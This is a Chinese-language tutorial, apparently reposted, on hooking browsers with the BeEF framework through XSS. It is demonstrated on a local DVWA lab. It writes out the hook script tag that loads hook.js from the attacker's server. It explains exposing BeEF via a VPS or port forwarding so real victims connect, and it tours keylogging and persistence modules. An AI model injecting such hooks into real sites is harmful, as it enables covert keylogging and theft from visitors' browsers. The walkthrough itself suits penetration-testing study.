XSS之Beef的使用


0x01 Beef簡介

BeEF是The Browser Exploitation Framework的縮寫。它是一種專注於Web瀏覽器的滲透測試工具。

beef管理、掛鈎web瀏覽器的過程:

生成交互paylaod的hook
服務器端:beef作為服務端管理,管理訪問運行了hook的客戶端
客戶端:運行與客戶端瀏覽器的 Javascript 腳本(hook),也就是beef生成的payload。
beef將運行了hook的web瀏覽器鈎住,進行管理

0x02攻擊手段

配合xss,將hook插入到存在xss的注入處;

直接誘使客戶端訪問含有 hook 的偽造站點

結合中間人攻擊注入 hook 腳本

0x03 用途

鍵盤記錄器
網絡掃描
瀏覽器信息收集
綁定 shell
與 metasploit 集成
等...

0x04 beef工具獲取

beef只支持Linux平台

獲取:

wget https://github.com/beefproject/beef/archive/master.zip
或:
git clone https://github.com/beefproject/beef

安裝配置查看:https://github.com/beefproject/beef/wiki/Installation

kali-linux自帶beef;

beef如果用於實戰的話,需要一台vps,也就是建立連接的時候要使受害機能訪問到beef,因此需要一個外網ip。

我的vps安裝beef的時候有點問題,那么我們可以使用本地kali的beef,開放服務后,對beef的服務端口進行端口轉發,轉發到我們外網的vps上,那么受害機訪問payload(hook)后就可以反向到我們的beef服務端了。

這里端口轉發可以使用frp、portfwd、ew等。

0x05使用

我在本地進行演示:

攻擊機kali:192.168.106.129

靶機DVWA:192.168.31.214

1.更改beef的默認用戶名密碼

beef的配置文件:/etc/beef-xss/config.yaml

beef的默認用戶名密碼為beef、beef,如果需要更改beef的用戶密碼,則在配置文件里面更改user和passwd的值

 

 2.啟動

終端輸入beef-xss即可啟動beef服務端。

 

 beef的服務端地址為:http://127.0.0.1:3000/ui/panel,啟動之后瀏覽器會自動打開網頁,進入登錄頁面,用戶密碼為默認的beef

 

登錄成功后,這里會顯示在線的主機和不在線的主機。在線的就是現在該主機瀏覽器執行了我們的JS腳本代碼,不在線的就是該主機曾經執行過我們的JS腳本代碼,但是現在叉掉了該頁面

3.插入腳本hook到靶機 

然后我們的hook啟動的時候已經給出:

Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="https://<IP>:3000/hook.js"></script>
[*] Example: <script src="https://127.0.0.1:3000/hook.js"></script>

kali的地址為192.1618.106.129,那么靶機上插入的hook js腳本為:

<script src="https://192.168.106.129:3000/hook.js"></script>

在靶機DVWA上找一個xss漏洞,將hook插入到注入點:

 

 留言提交后,靶機的瀏覽器就被beef鈎上了:

 

 因為我kali虛擬機開的nat模式,本機連的wifi,因此beef上顯示的ip不是我wifi分配的ip,但就是我本機。

存儲型xss的話只要插入的hook js語句,那么管理員正常訪問他的站點就會觸發,然后上鈎。

0x06 beef管理

在beef上上鈎了的受害機,beef對其可以獲取到很多主機、瀏覽器信息

1、Details是瀏覽器信息詳情

2.logs模塊-鍵盤記錄

 

 3.commands-命令模塊

Commands是你能對該瀏覽器進行哪些操作

主要模塊:

-Browsers

- Exploits

- Host

- Persistence(持久)

- Network

綠色圓圈:表示模塊適合目標瀏覽器,並且執行結果對客戶端不可見

紅色圓圈:表示模塊不適用與當前用戶,有些紅色模塊也可以正常執行

橙色圓圈:模塊可用,但結果對用戶可見(CAM 彈窗申請權限)

灰色圓圈:模塊未在目標瀏覽器上測試過

 

 

更多的請參照卿師傅的博客:https://blog.csdn.net/qq_17204441/article/details/90706415?ops_request_misc=%7B%22request%5Fid%22%3A%22158209161719724835856114%22%2C%22scm%22%3A%2220140713.130056874..%22%7D&request_id=158209161719724835856114&biz_id=0&utm_source=distribute.pc_search_result.none-task

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM